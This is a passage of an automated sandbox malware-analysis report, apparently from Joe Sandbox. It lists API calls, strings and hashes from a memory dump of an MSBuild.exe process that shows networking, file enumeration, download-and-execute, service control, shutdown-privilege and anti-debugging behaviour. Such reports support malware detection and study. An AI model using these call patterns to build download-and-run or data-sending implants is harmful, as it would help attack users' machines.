                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                • Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
                                                                                                • Opcode Fuzzy Hash: 66bc95b00190c33de1dc88885a8d3c2e2540cf288971a00217ef3550ead5f7a6
                                                                                                • Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                  • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(0040466D,000000FF,00000000,?,?,00000000,?,0040466D,00000000,?,?), ref: 004047FD
                                                                                                  • Part of subcall function 004047EB: SetEvent.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404808
                                                                                                  • Part of subcall function 004047EB: CloseHandle.KERNEL32(0040466D,?,00000000,?,0040466D,00000000,?,?,?,00000000), ref: 00404811
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                • String ID:
                                                                                                • API String ID: 4043647387-0
                                                                                                • Opcode ID: f77ff04bd8ddbdee7f05524a32e3f1eb592b07934ba2033eafa5768ce33d52d9
                                                                                                • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                                                • Opcode Fuzzy Hash: f77ff04bd8ddbdee7f05524a32e3f1eb592b07934ba2033eafa5768ce33d52d9
                                                                                                • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                • String ID:
                                                                                                • API String ID: 276877138-0
                                                                                                • Opcode ID: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                                                • Opcode Fuzzy Hash: b329c8b03f607fc556bfe747d7dfe709dacdcffe937466b951116c7124fc47ce
                                                                                                • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                                                APIs
                                                                                                  • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                  • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                  • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                  • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                  • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                • String ID: PowrProf.dll$SetSuspendState
                                                                                                • API String ID: 1589313981-1420736420
                                                                                                • Opcode ID: d0c288be5905aeb1458c4e67f100ac3994066ae8866f0c60d59ab3cb864808a3
                                                                                                • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                                                • Opcode Fuzzy Hash: d0c288be5905aeb1458c4e67f100ac3994066ae8866f0c60d59ab3cb864808a3
                                                                                                • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                                                • GetACP.KERNEL32 ref: 004512BA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                                                • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                                                • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                                                APIs
                                                                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                                                • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                                                • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                                                • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                • String ID: SETTINGS
                                                                                                • API String ID: 3473537107-594951305
                                                                                                • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                                                • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                • GetUserDefaultLCID.KERNEL32 ref: 004514C3
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00451594
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                • String ID:
                                                                                                • API String ID: 745075371-0
                                                                                                • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Find$File$CloseFirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 1157919129-0
                                                                                                • Opcode ID: c0514443f6b551c60d72a0102ad1ef2ed694fa26d927559f69c4179237a11564
                                                                                                • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                • Opcode Fuzzy Hash: c0514443f6b551c60d72a0102ad1ef2ed694fa26d927559f69c4179237a11564
                                                                                                • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadExecuteFileShell
                                                                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$open
                                                                                                • API String ID: 2825088817-2582742282
                                                                                                • Opcode ID: e23bf9b323bc2d692f9da81d03bbc7a22c6eb775334b1cc8aa9487b0952805cd
                                                                                                • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                • Opcode Fuzzy Hash: e23bf9b323bc2d692f9da81d03bbc7a22c6eb775334b1cc8aa9487b0952805cd
                                                                                                • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstNextsend
                                                                                                • String ID: x@G$x@G
                                                                                                • API String ID: 4113138495-3390264752
                                                                                                • Opcode ID: 8eaf7a4dc88b03731bc7a7e88c07bbd056d3bb85fccf69746681b5b9b90b18b3
                                                                                                • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                • Opcode Fuzzy Hash: 8eaf7a4dc88b03731bc7a7e88c07bbd056d3bb85fccf69746681b5b9b90b18b3
                                                                                                • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                • Opcode Fuzzy Hash: f4ba7aec24a953ef4b92a26ea97f229a08492362b077529f009aa708e5b31fc0
                                                                                                • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                  • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                  • Part of subcall function 004126D2: RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                  • Part of subcall function 004126D2: RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateInfoParametersSystemValue
                                                                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                • API String ID: 4127273184-3576401099
                                                                                                • Opcode ID: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                • Instruction ID: f2617a255fd7246e173cf48333a5ec3092ca3a632a8680fa2b2f8bd5747a896b
                                                                                                • Opcode Fuzzy Hash: 3cca19850bf31f4f0fb7f64d74422f26e2d0d512dadd11c93372ceda303b45d5
                                                                                                • Instruction Fuzzy Hash: 9EF0623278011422D529357A8E2FBEE1801D796B20F65402FF202A57D6FB8E46D142DE
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 00450B61
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00450CA2
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                • String ID:
                                                                                                • API String ID: 4212172061-0
                                                                                                • Opcode ID: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                • Opcode Fuzzy Hash: 30824fb3cb19d2287357d207385eed7a408457ce34d3ac4732c67f259351ba65
                                                                                                • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                APIs
                                                                                                • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileFind$FirstH_prologNext
                                                                                                • String ID:
                                                                                                • API String ID: 301083792-0
                                                                                                • Opcode ID: 209e856c4e66691fa080158237b85383cb973f177d2d93bd448955a551d37c6c
                                                                                                • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                • Opcode Fuzzy Hash: 209e856c4e66691fa080158237b85383cb973f177d2d93bd448955a551d37c6c
                                                                                                • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00448067
                                                                                                  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                • GetTimeZoneInformation.KERNEL32 ref: 00448079
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,0047179C,000000FF,?,0000003F,?,?), ref: 004480F1
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,?,004717F0,000000FF,?,0000003F,?,?,?,0047179C,000000FF,?,0000003F,?,?), ref: 0044811E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                • String ID:
                                                                                                • API String ID: 806657224-0
                                                                                                • Opcode ID: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                • Instruction ID: ab6739d36243922ba69d1bbe12a1b6ae93f84769bc63f42ae41568d8b76a7737
                                                                                                • Opcode Fuzzy Hash: 5e34e117c6e33b8c0844c195e2b7af46f687c91a19e7202acb7e93967a2f0af9
                                                                                                • Instruction Fuzzy Hash: 8731DA70904205DFEB149F68CC8186EBBF8FF05760B2442AFE054AB2A1DB349A42DB18
                                                                                                APIs
                                                                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                • String ID:
                                                                                                • API String ID: 2829624132-0
                                                                                                • Opcode ID: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                • Opcode Fuzzy Hash: 0004d795c3ddcb7d717e2e5c50f1122ee861edcca01c339632c8702d630a2b0e
                                                                                                • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                APIs
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 0043A755
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 0043A75F
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 0043A76C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                • String ID:
                                                                                                • API String ID: 3906539128-0
                                                                                                • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 00442575
                                                                                                • TerminateProcess.KERNEL32(00000000,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044257C
                                                                                                • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                • String ID:
                                                                                                • API String ID: 1703294689-0
                                                                                                • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: GetLocaleInfoEx
                                                                                                • API String ID: 2299586839-2904428671
                                                                                                • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
